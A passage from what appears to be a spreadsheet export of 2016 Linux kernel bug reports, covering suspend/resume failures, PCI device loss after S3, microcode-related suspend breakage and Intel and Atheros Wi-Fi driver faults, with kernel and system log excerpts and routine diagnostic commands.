the following on a failed resume, full messages are in the attachment: [ 64.390036] Restarting tasks ... [ 64.391004] pci_bus 0000:01: Allocating resources [ 64.391021] pci_bus 0000:02: Allocating resources [ 64.391062] pci_bus 0000:03: Allocating resources [ 64.391080] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment [ 64.391694] pci_bus 0000:01: Allocating resources [ 64.391710] pci_bus 0000:02: Allocating resources [ 64.391751] pci_bus 0000:03: Allocating resources [ 64.391767] i915 0000:00:02.0: BAR 6: [??? 0x00000000 flags 0x2] has bogus alignment [ 64.392450] done. [ 64.397339] general protection fault: 0000 [#1] PREEMPT SMP and some seconds later [ 91.278397] NMI watchdog: BUG: soft lockup - CPU#1 stuck for 23s! [systemd:1] [ 119.277892] NMI watchdog: BUG: soft lockup - CPU#1 stuck for 23s! [systemd:1] [ 151.277315] NMI watchdog: BUG: soft lockup - CPU#1 stuck for 22s! [systemd:1] The system does not recover from this and crashes later. Does the trace yield enough information to find some further hints on the problem? Thanks in advance and sorry in case this is a duplicate.</t>
  </si>
  <si>
    <t>Marvell 8897 not visible on PCI after resume from S3</t>
  </si>
  <si>
    <t>4.4.0-16-generic</t>
  </si>
  <si>
    <t>2016-04-21 06:06 UTC</t>
  </si>
  <si>
    <t>Laser Hsu</t>
  </si>
  <si>
    <t>2016-05-14 12:35 UTC</t>
  </si>
  <si>
    <t>Created attachment 213481 [details] pci info from lspci -vvv system : Dell Constantine. (Intell skylake-H) fail device : Marvell 8897 reproduce procedure: enter S3 by click on suspend button of start manu wait system suspend, click on keyboard to wake up system check wifi disapper from network management. analysis with devmem command device info : 02:00.0 Ethernet controller: Marvell Technology Group Ltd. 88W8897 [AVASTAR] 802.11ac Wireless Control: I/O- Mem- BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Interrupt: pin A routed to IRQ 255 Region 0: Memory at d0100000 (64-bit, prefetchable) [disabled] [size=1M] Region 2: Memory at d0000000 (64-bit, prefetchable) [disabled] [size=1M] Capabilities: &lt;access denied&gt; Kernel modules: mwifiex_pcie 03:00.0 Ethernet controller: Intel Corporation I210 Gigabit Network Connection (rev 03) Subsystem: Dell I210 Gigabit Network Connection Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR+ FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0 Interrupt: pin A routed to IRQ 0 Region 0: Memory at df000000 (32-bit, non-prefetchable) [size=512K] Region 2: I/O ports at e000 [size=32] Region 3: Memory at df080000 (32-bit, non-prefetchable) [size=16K] Capabilities: &lt;access denied&gt; Kernel driver in use: igb Kernel modules: igb memory access before suspend works : root@bdx00-Embedded-Box-PC-5000:/home/bdx00# devmem2 0xd0000c44 w /dev/mem opened. Memory mapped at address 0x7ffaa45f2000. Value at address 0xD0000C44 (0x7ffaa45f2c44): 0xFEDCBA00 root@bdx00-Embedded-Box-PC-5000:/home/bdx00# dmesg of resume: Memory access after resume failed: root@bdx00-Embedded-Box-PC-5000:/home/bdx00# devmem2 0xd0000c44 w /dev/mem opened. Memory mapped at address 0x7fd0317df000. Value at address 0xD0000C44 (0x7fd0317dfc44): 0xFFFFFFFF root@bdx00-Embedded-Box-PC-5000:/home/bdx00# from pci analyzer, no pci transection show in bus. pci bus re-scan can bring memory access back: echo 1 &gt; /sys/bus/pci/rescan root@bdx00-Embedded-Box-PC-5000:/home/bdx00# echo 1 &gt; /sys/bus/pci/rescan root@bdx00-Embedded-Box-PC-5000:/home/bdx00# root@bdx00-Embedded-Box-PC-5000:/home/bdx00# devmem2 0xd0000c44 w /dev/mem opened. Memory mapped at address 0x7fefcd0c1000. Value at address 0xD0000C44 (0x7fefcd0c1c44): 0xFEDCBA00 root@bdx00-Embedded-Box-PC-5000:/home/bdx00#</t>
  </si>
  <si>
    <t>Commit ab76f7b4ab2397f x86/mm: Set NX on gap between  __ex_table and rodata break resume from hibernation - Acer V5-573P-6896 Laptop (Intel i5-4200U)</t>
  </si>
  <si>
    <t>2016-04-22 19:04 UTC</t>
  </si>
  <si>
    <t>Logan Gunthorpe</t>
  </si>
  <si>
    <t>2016-07-13 06:06 UTC</t>
  </si>
  <si>
    <t>Stephen Smalley</t>
  </si>
  <si>
    <t>I have an Acer V5-573P-6896 Laptop (Intel i5-4200U) running Debian Jessie which has had a persistent issue resuming from hibernation. I've had this problem at since I purchased the laptop back with Wheezy and about 3.18. I've been trying to debug it on and off for some time. Most times the laptop will simply hang during resume but often times it will just work. It's fairly unpredictable when it will work or when it won't. During testing and debugging I've had long streaks where it works just fine but with everyday use it rarely works more than once in a row. I can usually reliably reproduce it by doing a fresh reboot to my desktop, starting Chrome and Ice Dove and within one or two hibernation cycles it is sure to freeze. When the system freezes, the fan speeds up likely indicating the CPU is busy. I can toggle the keyboard LED backlight as well as the LCD backlight using the Fn keys. (I assume this means the firmware is still operational). There is no capslock LED or similar. The magic sysrq key also does not work. I've done testing with pm_test and found that every mode except 'none' works every single time. It also makes no difference if I use pm-hibernate or echo disk to /sys/power/state. Setting pm_async to zero also does not help. I've found that (with some persistence) I can reproduce the problem if I boot into a minimal environment (init=/bin/bash), with minimal modules loaded. To do this I run a number of instances of a very simple test program that just allocates and writes to a large buffer of memory, then repeatedly hibernate. Occassionally this will hit the bug. Thus, I think we can eliminate most driver issues as few (if any) drivers are loaded before hibernation when the problem is triggered. I've tried two different swap devices: an mSATA SSD and a SATA HDD. Both exhibit the problem and have drastically different image loading speeds so it doesn't seem like a timing issue. I also tried an extra large partition with 20G available and it didn't make a difference. I played around with /sys/power/image_size and didn't see any concrete improvement (though very vaguely it seemed like a lower number froze slightly less often). I did some testing to see if a specific image size fails but could find no clear correlation. I've also done some debugging with pm_trace. I instrumented the kernel with a series of extra TRACE_RESUME and printk calls. I used this to verify that the kernel gets as far as the resume_image call in swsusp_arch_resume. I also added a few trace calls and printks to where I believe the image kernel is supposed to resume (in create_image where a comment says control flow magically appears). I don't know if TRACE_RESUME is supposed to work at this point, but I have no other way of knowing what's going on after resume_image if it doesn't work. The laptop does not have a serial port so I can't do any debugging that involves one. At this point I feel like I'm out of things to try. Any help would be appreciated. Thanks, Logan</t>
  </si>
  <si>
    <t>intel µ-code update breaks suspends</t>
  </si>
  <si>
    <t>4.7.1</t>
  </si>
  <si>
    <t>2016-04-23 11:52 UTC</t>
  </si>
  <si>
    <t>2016-09-06 16:00 UTC</t>
  </si>
  <si>
    <t>I have a kernel that boots without initramfs, so I added intel-ucode/06-3c-03 to …/firmware and the CONFIG_EXTRA_FIRMWARE config-options, so the kernel can update the intel µ-code early to revision 0x1e. This breaks suspend. If I remove “intel-ucode/06-3c-03” from CONFIG_EXTRA_FIRMWARE, the CPU µ-code stays at 0x09 and suspend works. This problem at least occurs with 4.4.8, 4.5.0, 4.5.1 and 4.5.2. Going into suspends seem to work: the hardware goes to suspend-mode. On waking up the hardware wakes up (LEDs going on and DVD-Rom making noises) as expected, but nothing more happens. The CPU is a Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz, cpu family 6, model 60, stepping 3 on a Gigabyte H87-HD3 motherboard and a Radeon R250 running Debian testing. From journalctl: kernel: microcode: CPU0 microcode updated early to revision 0x1e, date = 2015-08-13 kernel: Linux version 4.5.1 (berberic@hermione) (gcc version 5.3.1 20160323 (Debian 5.3.1-13) ) #5 SMP PREEMPT Mon Apr 18 21:36:20 CEST 2016 … kernel: smpboot: CPU0: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (family: 0x6, model: 0x3c, stepping: 0x3) kernel: Performance Events: PEBS fmt2+, 16-deep LBR, Haswell events, full-width counters, Intel PMU driver. kernel: ... version: 3 kernel: ... bit width: 48 kernel: ... generic registers: 4 kernel: ... value mask: 0000ffffffffffff kernel: ... max period: 0000ffffffffffff kernel: ... fixed-purpose events: 3 kernel: ... event mask: 000000070000000f kernel: x86: Booting SMP configuration: kernel: .... node #0, CPUs: #1 kernel: microcode: CPU1 microcode updated early to revision 0x1e, date = 2015-08-13 kernel: #2 kernel: microcode: CPU2 microcode updated early to revision 0x1e, date = 2015-08-13 kernel: #3 kernel: microcode: CPU3 microcode updated early to revision 0x1e, date = 2015-08-13 kernel: #4 #5 #6 #7 kernel: x86: Booted up 1 node, 8 CPUs kernel: smpboot: Total of 8 processors activated (54276.38 BogoMIPS)</t>
  </si>
  <si>
    <t>iwlwifi: 8260: frequent disconnections when power save is enabled</t>
  </si>
  <si>
    <t>Ubuntu's 4.4.0-21-generic</t>
  </si>
  <si>
    <t>2016-04-30 01:51 UTC</t>
  </si>
  <si>
    <t>Craig G</t>
  </si>
  <si>
    <t>2016-05-03 16:06 UTC</t>
  </si>
  <si>
    <t>I'm experiencing frequent disconnects using the iwlwifi (iwlmvm) driver with an Intel 8260 wireless NIC in a Thinkpad X1 Carbon. I'm running the current Ubuntu 4.4 kernel with Intel firmware version 16.242414.0. The system log doesn't show anything interesting after the module first loads. Eventually, WPA rekeying events begin to fail and then the base station sends a disconnect message 'due to excessive missing ACKs'. NetworkManager attempts to renegotiate the connection and succeeds through several iterations of this cycle. Eventually it's attempts fail consistently (even across network manager and wpa_supplicant restarts). rmmod iwlmvm/modprobe iwlmvm fixes the problem until the cycle begins again. Base station log: 12:52:03 2016 daemon.info hostapd: wlan0: STA 44:85:00:xx:xx:xx WPA: group key handshake completed (RSN) 13:02:03 2016 daemon.info hostapd: wlan0: STA 44:85:00:xx:xx:xx WPA: group key handshake completed (RSN) 13:12:03 2016 daemon.info hostapd: wlan0: STA 44:85:00:xx:xx:xx WPA: group key handshake completed (RSN) 13:17:14 2016 daemon.info hostapd: wlan0: STA 44:85:00:xx:xx:xx IEEE 802.11: disconnected due to excessive missing ACKs 13:17:44 2016 daemon.info hostapd: wlan0: STA 44:85:00:xx:xx:xx IEEE 802.11: deauthenticated due to inactivity (timer DEAUTH/REMOVE) Machine log: 11:32:06 live wpa_supplicant[14172]: wlp4s0: WPA: Group rekeying completed with 14:cc:20:xx:xx:xx [GTK=CCMP] 11:40:19 live wpa_supplicant[14172]: wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1 11:42:05 live wpa_supplicant[14172]: message repeated 106 times: [ wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1] ... 13:12:03 live wpa_supplicant[14172]: wlp4s0: WPA: Group rekeying completed with 14:cc:20:xx:xx:xx [GTK=CCMP] 13:12:03 live wpa_supplicant[14172]: wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1 13:17:01 live wpa_supplicant[14172]: message repeated 300 times: [ wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1] 13:17:02 live wpa_supplicant[14172]: wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1 ... 13:17:36 live kernel: [243960.308137] wlp4s0: disassociated from 14:cc:20:xx:xx:xx (Reason: 7) 13:17:36 live wpa_supplicant[14172]: message repeated 34 times: [ wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1] ... 13:17:37 live wpa_supplicant[14172]: wlp4s0: CTRL-EVENT-DISCONNECTED bssid=14:cc:20:xx:xx:xx reason=7 13:17:37 live wpa_supplicant[14172]: wlp4s0: SME: Trying to authenticate with 14:cc:20:xx:xx:xx (SSID='xxx' freq=5805 MHz) 13:17:37 live wpa_supplicant[14172]: wlp4s0: SME: Authentication request to the driver failed 13:17:37 live NetworkManager[14269]: &lt;warn&gt; [1461777457.0121] sup-iface[0x1cc72b0,wlp4s0]: connection disconnected (reason 7) 13:17:37 live NetworkManager[14269]: &lt;info&gt; [1461777457.0161] device (wlp4s0): supplicant interface state: completed -&gt; disconnected 13:17:37 live gnome-session[1522]: Gjs-Message: JS LOG: An active wireless connection, in infrastructure mode, involves no access point? 13:17:37 live wpa_supplicant[14172]: wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1 13:17:52 live wpa_supplicant[14172]: message repeated 15 times: [ wlp4s0: CTRL-EVENT-SCAN-FAILED ret=-16 retry=1] 13:17:52 live NetworkManager[14269]: &lt;warn&gt; [1461777472.7419] device (wlp4s0): link timed out. 13:17:52 live NetworkManager[14269]: &lt;info&gt; [1461777472.7420] device (wlp4s0): state change: activated -&gt; failed (reason 'ssid-not-found') [100 120 53] 13:17:52 live NetworkManager[14269]: &lt;info&gt; [1461777472.7430] manager: NetworkManager state is now CONNECTED_LOCAL 13:17:52 live NetworkManager[14269]: &lt;info&gt; [1461777472.7434] manager: NetworkManager state is now DISCONNECTED 13:17:52 live whoopsie[811]: [13:17:52] offline 13:17:52 live NetworkManager[14269]: &lt;warn&gt; [1461777472.7556] device (wlp4s0): Activation: failed for connection 'xxx' 13:17:52 live dbus[843]: [system] Activating via systemd: service name='org.freedesktop.nm_dispatcher' unit='dbus-org.freedesktop.nm-dispatcher.service'</t>
  </si>
  <si>
    <t>Log improvement - "ACPI: %u ACPI AML tables successfully acquired and loaded" should be KERN_INFO</t>
  </si>
  <si>
    <t>2016-05-01 02:22 UTC</t>
  </si>
  <si>
    <t>2016-05-20 03:09 UTC</t>
  </si>
  <si>
    <t>It's currently KERN_WARNING. KERN_WARNING should be used for warnings, not success messages. I looked at the code, found that it's ACPI_INFO, and then got lost in all the indirection when trying to figure out where KERN_WARNING comes from.</t>
  </si>
  <si>
    <t>Root NFS and autofs - mount disappears due to inode revalidate failed</t>
  </si>
  <si>
    <t>4.1.15</t>
  </si>
  <si>
    <t>2016-05-05 11:21 UTC</t>
  </si>
  <si>
    <t>alexpro</t>
  </si>
  <si>
    <t>2016-08-02 13:44 UTC</t>
  </si>
  <si>
    <t>Created attachment 215321 [details] log fragment with failed getattr After upgrading from 3.14.12 to 4.1.15 I've got strange behaviour with autofs. It happens on diskless machine with root on NFS. There is autofs indirect mount on /storage, where NFS volumes are mounted on demand. Everything mounts normally, but after mount expiration (during unmount) autofs mount disappears - that is, not only /storage/&lt;volume&gt; unmounts, but /storage is also unmounted. This happens quite often - usually on the very first expiration. automount logs umount error in such cases. Without autofs, mount/umount of the same NFS volume works correctly. With NFS debug enabled, I've got following errors: NFS reply getattr: -512 nfs_revalidate_inode: (0:15/6291480) getattr failed, error=-512 NFS: nfs_lookup_revalidate(/storage) is invalid After inode revalidate failure all mounts on this inode are unmounted and so autofs mount disappears, while automount daemon itself continue to run. tcpdump shows, that server replies to getattr without error, but client doesn't see this reply, and returning error instead. I am ready to supply additional information.</t>
  </si>
  <si>
    <t>iwlwifi: 7260: queue stuck during p2p session - MWG100259735</t>
  </si>
  <si>
    <t>4.4.9</t>
  </si>
  <si>
    <t>2016-05-13 11:44 UTC</t>
  </si>
  <si>
    <t>matthias.fend</t>
  </si>
  <si>
    <t>2016-05-22 09:33 UTC</t>
  </si>
  <si>
    <t>In this test case I use a AC7260 on a Linux 4.4.9 based system and establish a P2P connection to a Windows10 based devices which acts as GO. The connection itself works without problems and is usually very stable. But when a WLAN scan is triggered on the Windows10 devices (eg. to search for accesspoints) problems are coming up. Basically it seems obvious that there are minor connection dropouts since the WLAN transceiver of the Windows10 device does not receive/transmit data on the p2p channel if it's currently listening on another one. But I think the queue should not stuck in such a case. Also the current p2p connection is gone. After module recovery is finished it is possible to establish new p2p connection without any other special actions. [..] iwlwifi 0000:02:00.0: Queue 4 stuck for 10000 ms. iwlwifi 0000:02:00.0: Current SW read_ptr 29 write_ptr 37 iwl data: 00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ iwlwifi 0000:02:00.0: FH TRBs(0) = 0x00000000 iwlwifi 0000:02:00.0: FH TRBs(1) = 0x8010601f iwlwifi 0000:02:00.0: FH TRBs(2) = 0x00000000 iwlwifi 0000:02:00.0: FH TRBs(3) = 0x80304024 iwlwifi 0000:02:00.0: FH TRBs(4) = 0x00000000 iwlwifi 0000:02:00.0: FH TRBs(5) = 0x00000000 iwlwifi 0000:02:00.0: FH TRBs(6) = 0x00000000 iwlwifi 0000:02:00.0: FH TRBs(7) = 0x0070904e iwlwifi 0000:02:00.0: Q 0 is active and mapped to fifo 3 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 1 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 2 is active and mapped to fifo 1 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 3 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 4 is active and mapped to fifo 3 ra_tid 0x0000 [29,37] iwlwifi 0000:02:00.0: Q 5 is active and mapped to fifo 2 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 6 is active and mapped to fifo 1 ra_tid 0x0000 [31,32] iwlwifi 0000:02:00.0: Q 7 is active and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 8 is active and mapped to fifo 3 ra_tid 0x0000 [7,7] iwlwifi 0000:02:00.0: Q 9 is active and mapped to fifo 7 ra_tid 0x0000 [79,79] iwlwifi 0000:02:00.0: Q 10 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 11 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 12 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 13 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 14 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 15 is active and mapped to fifo 5 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 16 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 17 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 18 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 19 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 20 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 21 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 22 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 23 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 24 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 25 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 26 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 27 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 28 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 29 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Q 30 is inactive and mapped to fifo 0 ra_tid 0x0000 [0,0] iwlwifi 0000:02:00.0: Microcode SW error detected. Restarting 0x2000000. iwlwifi 0000:02:00.0: CSR values: iwlwifi 0000:02:00.0: (2nd byte of CSR_INT_COALESCING is CSR_INT_PERIODIC_REG) iwlwifi 0000:02:00.0: CSR_HW_IF_CONFIG_REG: 0X40489204 iwlwifi 0000:02:00.0: CSR_INT_COALESCING: 0X8000ff40 iwlwifi 0000:02:00.0: CSR_INT: 0X10000000 iwlwifi 0000:02:00.0: CSR_INT_MASK: 0X00000000 iwlwifi 0000:02:00.0: CSR_FH_INT_STATUS: 0X00000000 iwlwifi 0000:02:00.0: CSR_GPIO_IN: 0X00000000 iwlwifi 0000:02:00.0: CSR_RESET: 0X00000000 iwlwifi 0000:02:00.0: CSR_GP_CNTRL: 0X080403cd iwlwifi 0000:02:00.0: CSR_HW_REV: 0X00000144 iwlwifi 0000:02:00.0: CSR_EEPROM_REG: 0X00000000 iwlwifi 0000:02:00.0: CSR_EEPROM_GP: 0X80000000 iwlwifi 0000:02:00.0: CSR_OTP_GP_REG: 0X803a0000 iwlwifi 0000:02:00.0: CSR_GIO_REG: 0X001f0044 iwlwifi 0000:02:00.0: CSR_GP_UCODE_REG: 0X00000000 iwlwifi 0000:02:00.0: CSR_GP_DRIVER_REG: 0X00000000 iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP1: 0X00000000 iwlwifi 0000:02:00.0: CSR_UCODE_DRV_GP2: 0X00000000 iwlwifi 0000:02:00.0: CSR_LED_REG: 0X00000060 iwlwifi 0000:02:00.0: CSR_DRAM_INT_TBL_REG: 0X880fffff iwlwifi 0000:02:00.0: CSR_GIO_CHICKEN_BITS: 0X27800200 iwlwifi 0000:02:00.0: CSR_ANA_PLL_CFG: 0Xd55555d5 iwlwifi 0000:02:00.0: CSR_MONITOR_STATUS_REG: 0X3d0801bd iwlwifi 0000:02:00.0: CSR_HW_REV_WA_REG: 0X0001001a iwlwifi 0000:02:00.0: CSR_DBG_HPET_MEM_REG: 0Xffff0000 iwlwifi 0000:02:00.0: FH register values: iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_STTS_WPTR_REG: 0X0ffffd00 iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_RBDCB_BASE_REG: 0X00ffffe0 iwlwifi 0000:02:00.0: FH_RSCSR_CHNL0_WPTR: 0X00000028 iwlwifi 0000:02:00.0: FH_MEM_RCSR_CHNL0_CONFIG_REG: 0X00801114 iwlwifi 0000:02:00.0: FH_MEM_RSSR_SHARED_CTRL_REG: 0X000000fc iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_STATUS_REG: 0X03030000 iwlwifi 0000:02:00.0: FH_MEM_RSSR_RX_ENABLE_ERR_IRQ2DRV: 0X00000000 iwlwifi 0000:02:00.0: FH_TSSR_TX_STATUS_REG: 0X07ff0001 iwlwifi 0000:02:00.0: FH_TSSR_TX_ERROR_REG: 0X00000000 iwlwifi 0000:02:00.0: Start IWL Error Log Dump: iwlwifi 0000:02:00.0: Status: 0x00000000, count: 6 iwlwifi 0000:02:00.0: Loaded firmware version: 17.265642.0 iwlwifi 0000:02:00.0: 0x00000084 | NMI_INTERRUPT_UNKNOWN iwlwifi 0000:02:00.0: 0x00000687 | uPc iwlwifi 0000:02:00.0: 0x00000000 | branchlink1 iwlwifi 0000:02:00.0: 0x00000B30 | branchlink2 iwlwifi 0000:02:00.0: 0x000162C8 | interruptlink1 iwlwifi 0000:02:00.0: 0x000162C8 | interruptlink2 iwlwifi 0000:02:00.0: 0x00000000 | data1 iwlwifi 0000:02:00.0: 0x00000080 | data2 iwlwifi 0000:02:00.0: 0x07030000 | data3 iwlwifi 0000:02:00.0: 0x00000000 | beacon time iwlwifi 0000:02:00.0: 0x0424B102 | tsf low iwlwifi 0000:02:00.0: 0x00000000 | tsf hi iwlwifi 0000:02:00.0: 0x00000000 | time gp1 iwlwifi 0000:02:00.0: 0x0424B103 | time gp2 iwlwifi 0000:02:00.0: 0x00000000 | time gp3 iwlwifi 0000:02:00.0: 0x00000011 | uCode version major iwlwifi 0000:02:00.0: 0x00040DAA | uCode version minor iwlwifi 0000:02:00.0: 0x00000144 | hw version iwlwifi 0000:02:00.0: 0x40489204 | board version iwlwifi 0000:02:00.0: 0x0424001C | hcmd iwlwifi 0000:02:00.0: 0x82722000 | isr0 iwlwifi 0000:02:00.0: 0x00800000 | isr1 iwlwifi 0000:02:00.0: 0x0000000A | isr2 iwlwifi 0000:02:00.0: 0x00417C84 | isr3 iwlwifi 0000:02:00.0: 0x00000000 | isr4 iwlwifi 0000:02:00.0: 0x10000112 | isr_pref iwlwifi 0000:02:00.0: 0x00000000 | wait_event iwlwifi 0000:02:00.0: 0x00004288 | l2p_control iwlwifi 0000:02:00.0: 0x0001BC24 | l2p_duration iwlwifi 0000:02:00.0: 0x000003BF | l2p_mhvalid iwlwifi 0000:02:00.0: 0x00EF0000 | l2p_addr_match iwlwifi 0000:02:00.0: 0x00000005 | lmpm_pmg_sel iwlwifi 0000:02:00.0: 0x24121911 | timestamp iwlwifi 0000:02:00.0: 0x00345038 | flow_handler ieee80211 phy1: Hardware restart was requested iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled iwlwifi 0000:02:00.0: L1 Disabled - LTR Enabled [..]</t>
  </si>
  <si>
    <t>acpi-cpufreq 4.6 cpufreq_update_policy get zero of current cpufreq during resume</t>
  </si>
  <si>
    <t>2016-05-18 01:12 UTC</t>
  </si>
  <si>
    <t>2016-08-01 07:55 UTC</t>
  </si>
  <si>
    <t>From: Augusto Mecking Caringi &lt;augustocaringi@gmail.com&gt; After I've upgraded to the latest kernel (4.6), I'm getting some ACPI related warnings during startup like that: [ 5897.966583] WARNING: CPU: 0 PID: 8240 at drivers/cpufreq/cpufreq.c:2173 cpufreq_update_policy+0xcf/0xf0 [ 5897.966586] Modules linked in: iptable_nat nf_nat_ipv4 nf_nat x86_pkg_temp_thermal apple_gmux [ 5897.966589] CPU: 0 PID: 8240 Comm: kworker/0:1 Not tainted 4.6.0-00442-gcf6ed9a #13 [ 5897.966589] Hardware name: Apple Inc. MacBookPro8,1/Mac-94245B3640C91C81, BIOS MBP81.88Z.0047.B27.1201241646 01/24 /12 [ 5897.966593] Workqueue: kacpi_notify acpi_os_execute_deferred [ 5897.966595] 0000000000000000 ffff8800347b3ba8 ffffffff8153d118 0000000000000000 [ 5897.966596] 0000000000000000 ffff8800347b3be8 ffffffff810a9b06 0000087d810e4eb2 [ 5897.966598] ffff880169384a00 00000000fffffffb ffff880169384b10 0000000000000000 [ 5897.966598] Call Trace: [ 5897.966602] [&lt;ffffffff8153d118&gt;] dump_stack+0x4d/0x65 [ 5897.966604] [&lt;ffffffff810a9b06&gt;] __warn+0xc6/0xe0 [ 5897.966606] [&lt;ffffffff810a9bd8&gt;] warn_slowpath_null+0x18/0x20 [ 5897.966607] [&lt;ffffffff8189ba3f&gt;] cpufreq_update_policy+0xcf/0xf0 [ 5897.966608] [&lt;ffffffff8189ba60&gt;] ? cpufreq_update_policy+0xf0/0xf0 [ 5897.966611] [&lt;ffffffff815d28a6&gt;] acpi_processor_ppc_has_changed+0x6f/0x77 [ 5897.966614] [&lt;ffffffff815cf96f&gt;] acpi_processor_notify+0x51/0xdc [ 5897.966616] [&lt;ffffffff815b5468&gt;] acpi_ev_notify_dispatch+0x3f/0x57 [ 5897.966617] [&lt;ffffffff815a0b32&gt;] acpi_os_execute_deferred+0xf/0x1b [ 5897.966620] [&lt;ffffffff810c0d98&gt;] process_one_work+0x158/0x470 [ 5897.966621] [&lt;ffffffff810c10f3&gt;] worker_thread+0x43/0x4d0 [ 5897.966623] [&lt;ffffffff810c10b0&gt;] ? process_one_work+0x470/0x470 [ 5897.966625] [&lt;ffffffff810c6404&gt;] kthread+0xc4/0xe0 [ 5897.966628] [&lt;ffffffff81b47412&gt;] ret_from_fork+0x22/0x40 [ 5897.966630] [&lt;ffffffff810c6340&gt;] ? kthread_worker_fn+0x160/0x160 [ 5897.966631] ---[ end trace f45cd8737fc1698b ]--- This message appears 6 times at each boot. Are they normal? Maybe wrong ACPI kernel options configured?</t>
  </si>
  <si>
    <t>REGRESSION: iwl-8260: Constant microcode restarts</t>
  </si>
  <si>
    <t>4.7 pre-rc1</t>
  </si>
  <si>
    <t>2016-05-18 14:26 UTC</t>
  </si>
  <si>
    <t>2016-05-18 19:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 216511 [details] dmesg.txt Tried this with ucode 21 and 20. I had seem sporadic restarts in 4.6, which seems to have resolved itself in final. As of the latest 4.7 (0b7962a6c4a37ef3cbb25d976af7b9ec4ce8ad01), the restarts are constant and the network never connects. lspci -vvv and dmesg attached. I tried to bisect this, but wasn't able to nail it down to a specific commit.</t>
  </si>
  <si>
    <t>[regression] ath10k no longer authenitcates and freezes system</t>
  </si>
  <si>
    <t>4.7-rc0</t>
  </si>
  <si>
    <t>2016-05-27 12:36 UTC</t>
  </si>
  <si>
    <t>2016-07-02 08:48 UTC</t>
  </si>
  <si>
    <t>Since the updates for 4.7 landed in Linus's tree my system freezes and I get a continuous stream of errors in my logs, I always have to hard reset my machine. I'll attach the firmware I'm using too 3c:00.0 Network controller [0280]: Qualcomm Atheros QCA6174 802.11ac Wireless Network Adapter [168c:003e] (rev 32)</t>
  </si>
  <si>
    <t>Boot EC requirement - Lid no longer wakes system from suspend</t>
  </si>
  <si>
    <t>4.7-rc1</t>
  </si>
  <si>
    <t>2016-05-30 15:14 UTC</t>
  </si>
  <si>
    <t>2016-06-21 05:34 UTC</t>
  </si>
  <si>
